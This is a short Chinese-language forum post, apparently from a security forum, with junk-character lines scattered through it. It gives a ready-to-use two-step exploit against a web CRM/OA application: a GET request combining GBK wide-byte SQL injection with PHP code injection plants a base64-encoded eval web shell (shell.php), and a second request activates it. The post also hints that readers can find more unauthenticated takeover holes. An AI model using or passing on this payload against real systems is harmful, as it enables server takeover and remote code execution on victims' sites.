此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
# E6 T; I( M) S# y* O% K% P2 J2 [1 h2 h" @- m9 o! Z
5 M# d; u6 a9 y* Q3 ] \EXP:
0 K) Z, r" {5 _- K4 z, N 7 N# W" x, i8 a5 |8 {8 ]) |
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
A& S) m' L" f+ r7 D$ u1 N8 m% M' w p6 w" w' [6 ^. K
第二步: [GET]http://site/general/email/index.php
. X" a2 t+ b5 B. _2 \( b- c8 `
: P; @; _( s1 \4 [ _0 ?9 mSHELL: http://site/general/email/shell.php 密码C1 t7 f$ j5 ~1 A3 _
3 x. @; x2 X0 j3 \2 c) A2 r6 u
: Z- w5 ~3 F8 X" C此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
" o3 G0 _1 y5 r
/ c6 ~: d/ w* v! K有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
' z6 L @' c$ s7 b$ y h4 X9 V ?- Z/ U2 a7 r) x
9 \ l* `, E5 t' o1 |) ?
|